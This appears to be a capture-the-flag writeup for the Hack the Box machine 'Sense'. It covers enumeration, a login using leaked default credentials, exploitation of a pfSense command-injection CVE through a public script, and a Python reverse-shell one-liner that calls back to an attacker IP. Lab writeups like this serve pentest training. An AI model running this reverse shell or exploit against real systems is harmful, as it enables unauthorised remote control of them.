👨💻
👨💻
👨💻
👨💻
Pentesting
HomeCTFsLearn
Search…
Zeyu's Pentesting Writeups
Home
CTF Writeups
My Vulnerable Website
Blog Posts
My OSCP Journey: How I Tried Harder
Proving Grounds
Warm Up
Get to Work
Try Harder
Hack the Box
Easy
ScriptKiddie
Delivery
Laboratory
Academy
Sense
Medium
Powered By GitBook
Sense
Writeup for Sense from Hack the Box

Service Enumeration

nmapAutomator.sh -H 10.10.10.60 -t all
There is a web service running on standard ports.
It turns out to be a pfSense login page.
The initial subdirectory enumeration did not yield anything interesting. If we look for .txt and .php files, however, we find some more interesting files.
gobuster dir -u https://10.10.10.60 -w /usr/share/dirb/wordlists/common.txt -x .txt,.php -k
The PHP pages will load the login page.
However, we find a changelog.txt:
1
# Security Changelog
2
​
3
### Issue
4
There was a failure in updating the firewall. Manual patching is therefore required
5
​
6
### Mitigated
7
2 of 3 vulnerabilities have been patched.
8
​
9
### Timeline
10
The remaining patches will be installed during the next maintenance window
Copied!
Using a longer wordlist, /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt, we find another .txt file.
1
####Support ticket###
2
​
3
Please create the following user
4
​
5
​
6
username: Rohit
7
password: company defaults
Copied!

Exploitation

The default credentials, admin:pfsense do not work. However, the system-users.txt file above indicated that a Rohit username exists, with a "company default" password.
Using the credentials rohit:pfsense, we successfully authenticate into the web application.
Here, we get more information on the system version.
This version is vulnerable to CVE 2014-4688, a command injection vulnerability.
Using code from https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py, we can exploit the vulnerability.
Change the configuration to suit our needs:
1
username = "rohit"
2
password = "pfsense"
3
listener_ip = "10.10.14.23"
4
listener_port = "4444"
5
target_ip = "10.10.10.60"
Copied!
The service is running as root, so we get a root shell.
To upgrade to an interactive shell, we can catch the Python reverse shell on another terminal:
export RHOST="10.10.14.23";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
Previous
Academy
Next - Hack the Box
Medium
Last modified 1yr ago
Copy link
Contents
Service Enumeration
Exploitation